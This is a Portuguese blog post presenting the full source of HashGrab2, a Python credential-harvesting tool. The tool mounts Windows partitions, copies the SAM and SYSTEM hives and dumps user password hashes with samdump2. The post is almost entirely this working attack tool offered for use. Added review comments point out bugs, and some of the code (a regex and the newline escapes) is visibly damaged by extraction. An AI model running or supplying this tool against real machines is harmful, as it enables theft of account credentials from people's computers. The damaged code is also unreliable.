terça-feira, 28 de dezembro de 2010

Hashgrab2 - extraindo usuário e senha do Windows

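O Hashgrab2 encontra e monta automaticamente uma partição Windows e usa a ferramenta samdump2 para extrair os nomes de usuário e os hashes de senha armazenados nos arquivos SAM e SYSTEM. O script precisa ser executado como root em um sistema com acesso direto ao disco; volumes protegidos por criptografia de disco completo (por exemplo, BitLocker) não ficam legíveis a uma montagem simples como essa.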

#!/usr/bin/env python
#Name:    HashGrab2.py
#Version: 2.0
#Author:  s3my0n
#Website: InterN0T.net

#########################################################################
# HashGrab2 automatically mounts any Windows drives it can find, and    #
# using samdump2 extracts username-password hashes from SAM and SYSTEM  #
# files located on the Windows drive, after which it writes them to     #
# user specified directory.                                             #
#                                                                       #
# Copyright (C) 2010 s3my0n                                             #
#                                                                       #
# This program is free software: you can redistribute it and/or modify  #
# it under the terms of the GNU General Public License as published by  #
# the Free Software Foundation, either version 3 of the License, or     #
# any later version.                                                    #
#                                                                       #
# This program is distributed in the hope that it will be useful,       #
# but WITHOUT ANY WARRANTY; without even the implied warranty of        #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the         #
# GNU General Public License for more details.                          #
#                                                                       #
# You should have received a copy of the GNU General Public License     #
# along with this program.  If not, see <http://www.gnu.org/licenses/>. #
#########################################################################

import sys, os, random, shutil, re, subprocess
from time import sleep

class HashGrab(object):
    """Mount local Windows partitions, copy their SAM/SYSTEM hives and dump hashes.

    The methods are meant to run in the order used by the ``__main__`` block
    of this file: findPartitions, mountPartitions, findSamSystem,
    copySamSystem, extractHashes, writeHashes, cleanUp.  Each step stores its
    results on the instance for the next one.

    Security-relevant behaviour visible in this class:
      * The hives are read from a mounted filesystem, so the script needs
        root and a volume that a plain ``mount`` can read.
        NOTE(review): an encrypted volume (e.g. BitLocker) would presumably
        fail at the mount step -- confirm.
      * Copies of SAM/SYSTEM and the resulting ``<name>.txt`` hash files are
        written under ``basedir`` with no explicit permissions set, and the
        .txt files are never removed by cleanUp().
    """
    # NOTE(review): the leading 'n' in the printed messages below looks like a
    # "\n" escape whose backslash was lost when the page was extracted.
    def __init__(self, basedir, filesystems=['HPFS/NTFS', 'FAT16/FAT32']):
        """Store the output directory and the fdisk type labels to look for.

        basedir is used by plain string concatenation later on, so it must
        already end with "/".
        """
        # NOTE(review): mutable default argument; this class only reads the
        # list, but the same object is shared by every instance.
        self.basedir = basedir
        self.filesystems = filesystems
        # Candidate hive directories, relative to a mount point (case variants).
        self.dirstocheck = ['/WINDOWS/System32/config/', '/Windows/System32/config/',
                            '/WINNT/System32/config/', '/WINDOWS/system32/config/']
        # Hive file names to probe; copySamSystem() depends on this order.
        self.files = ['SYSTEM', 'SAM', 'system', 'sam']

        # mount name -> lines printed by samdump2
        self.hashes = {}
        # device paths taken from the fdisk output
        self.devs = []
        # [mount directory, random name] per device
        self.mountdirs = []
        # mount name -> directory holding the copied hives
        self.samsystem_dirs = {}
        # per partition: [mount directory, random name, found file paths...]
        self.filestocopy = []

    def findPartitions(self):
        """Record the device path of every partition fdisk lists with a wanted type.

        Exits with status 1 unless ``whoami`` prints ``root``.  Matching
        devices are appended to ``self.devs``.
        """
        # ('whoami') is a plain string, not a 1-tuple; Popen runs it as the program name.
        decider = subprocess.Popen(('whoami'), stdout=subprocess.PIPE).stdout
        decider = decider.read().strip()
        if decider != 'root':
            print 'n [-] Error: you are not root'
            sys.exit(1)
        else:
            ofdisk = subprocess.Popen(('fdisk', '-l'), stdout=subprocess.PIPE).stdout
            rfdisk = [i.strip() for i in ofdisk]
            ofdisk.close()
            for line in rfdisk:
                for f in self.filesystems:
                    if f in line:
                        # NOTE(review): the pattern as printed looks
                        # extraction-damaged; if findall() returns an empty
                        # list, dev[0] below raises IndexError.
                        dev = re.findall('/w+/w+d+', line)
                        self.devs.append(dev[0])

    def mountPartitions(self):
        """Create /mnt/<random name> for each device in self.devs and mount it there."""
        def randgen(integer):
            """Return `integer` distinct characters drawn from [0-9a-zA-Z]."""
            chars = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
            x = random.sample(chars, integer)
            randstring = ''.join(x)
            return randstring
        for dev in self.devs:
            mname = randgen(6)
            mdir = '/mnt/%s' % (mname)
            # Recorded before mkdir/mount so that cleanUp() knows about the directory.
            self.mountdirs.append([mdir, mname])
            os.mkdir(mdir)
            cmd = subprocess.call(('mount', '%s'%(dev), '%s'%(mdir)))
            # Only exit status 1 is treated as failure; any other non-zero
            # status from mount takes the "Mounted" branch.
            if cmd == 1:
                print 'n [-] Could not mount %s to %s: exiting' % (dev, mdir)
                # Exits without cleanUp(): earlier mounts and the /mnt
                # directories created so far are left in place.
                sys.exit(1)
            else:
                print 'n [*] Mounted %s to %s' % (dev, mdir)

    def findSamSystem(self):
        """Append every existing candidate hive path to the partition's entry."""
        part_number = 0
        for m in self.mountdirs:
            # m is the same list object stored in self.mountdirs, so the
            # paths appended below also show up there (index 0 is unchanged).
            self.filestocopy.append(m)
            for d in self.dirstocheck:
                for f in self.files:
                    cdir = '%s%s%s' % (m[0], d, f)
                    if os.path.isfile(cdir):
                        self.filestocopy[part_number].append(cdir)
            part_number+=1

    def copySamSystem(self):
        """Copy the first two found hive files of each partition into basedir/<name>.

        Exits after cleanUp() when no partition yielded at least two files.
        """
        nmountdirs = len(self.mountdirs)
        decider = 0
        ftocopy = []
        for f in self.filestocopy:
            # Fewer than 4 items means [mount dir, name] plus at most one file.
            if len(f) < 4:
                decider += 1
            else:
                ftocopy.append(f)
        if decider == nmountdirs:
            print 'n [-] Could not find SAM and SYSTEM files in %s' % (self.devs)
            self.cleanUp()
            # sys.exit() without an argument: the process exits with status 0.
            sys.exit()
        else:
            print 'n [*] Copying SAM and SYSTEM files...n'
            for f in ftocopy:
                cpdir = '%s%s' % (self.basedir, f[1])
                self.samsystem_dirs[f[1]] = cpdir
                os.mkdir(cpdir)
                # Positional: f[2] is taken to be SYSTEM and f[3] to be SAM,
                # which follows from the probing order in findSamSystem().
                # NOTE(review): that holds only if both were found in the
                # same directory and in that order -- confirm.
                shutil.copy(f[2], '%s/SYSTEM'%(cpdir))
                shutil.copy(f[3], '%s/SAM'%(cpdir))

    def extractHashes(self):
        """Run samdump2 on each copied hive pair and keep its output lines."""
        for d in self.samsystem_dirs:
            try:
                cmd = subprocess.Popen(('samdump2', '%s/SAM'%(self.samsystem_dirs[d]), '%s/SYSTEM'%(self.samsystem_dirs[d])), stdout=subprocess.PIPE).stdout
                self.hashes[d] = cmd.readlines()
            except OSError:
                print 'n [-] SamDump2 was not found: exiting'
                # cleanUp() is called with cpdirs=False here, so the copied
                # SAM/SYSTEM directories stay under basedir.
                self.cleanUp()
                sys.exit(1)

    def writeHashes(self):
        """Write each partition's samdump2 output to basedir + <name> + '.txt'."""
        for i in self.hashes:
            try:
                # The file is created with the process's default permissions.
                ofile = open('%s%s.txt'%(self.basedir, i), 'w+')
                hashes = self.hashes[i]
                for line in hashes:
                    ofile.write(line)
                # Not reached if write() raises; the handle is then left open.
                ofile.close()
            except IOError:
                print 'n [-] Error: could not open %s to write hashes to' % ('%s%s.txt'%(self.basedir, i))
                self.cleanUp(cpdirs=True)
                sys.exit(1)

    def cleanUp(self, devs=True, mdirs=True, cpdirs=False):
        """Undo the mounts and temporary directories.

        devs:   unmount every device in self.devs.
        mdirs:  remove the /mnt mount directories.
        cpdirs: also delete the directories holding the copied hives.
        The .txt files written by writeHashes() are not touched.
        """
        if devs:
            print 'n [*] Unmounting partitions...'
            sleep(1) # sometimes fails if you don't sleep
            for dev in self.devs:
                # The umount exit status is ignored.
                subprocess.call(('umount', '%s'%(dev)))
        if mdirs:
            print 'n [*] Deleting mount directories...'
            for d in self.mountdirs:
                # os.rmdir only removes empty directories.
                # NOTE(review): if an umount above failed, this presumably
                # raises OSError -- confirm.
                os.rmdir(d[0])
        if cpdirs:
            print 'n [*] Deleting %s' % (self.samsystem_dirs.values())
            for d in self.samsystem_dirs.values():
                shutil.rmtree(d)

def about():
    """Return the ASCII-art banner with the version, site and contact lines."""
    banner = r'''
  _               _                     _    ___
 | |             | |                   | |  |__
 | |__   __ _ ___| |__   __ _ _ __ __ _| |__   ) |
 | '_  / _` / __| '_  / _` | '__/ _` | '_  / /
 | | | | (_| __  | | | (_| | | | (_| | |_) / /_
 |_| |_|__,_|___/_| |_|__, |_|  __,_|_.__/____|
                         __/ |
                        |___/

 HashGrab v2.0 by s3my0n

http://InterN0T.net

 Contact: RuSH4ck3R[at]gmail[dot]com
 '''
    return banner

if __name__ == '__main__':
    # Show the banner before doing anything else.
    print about()

    # Directory that receives the copied hives and the .txt hash files.
    # Change it here; the path must exist and end with "/" because every
    # output path is built by string concatenation.
    basedir = './'

    basedir_ok = os.path.exists(basedir) and basedir.endswith('/')
    if not basedir_ok:
        print 'n [-] Error: check your basedir'
        sys.exit(1)

    # Run the pipeline in its fixed order; each step feeds the next one.
    grabber = HashGrab(basedir)
    grabber.findPartitions()
    grabber.mountPartitions()
    grabber.findSamSystem()
    grabber.copySamSystem()
    grabber.extractHashes()
    grabber.writeHashes()
    # Final cleanup also removes the copied SAM/SYSTEM directories; the
    # .txt hash files remain in basedir.
    grabber.cleanUp(cpdirs=True)



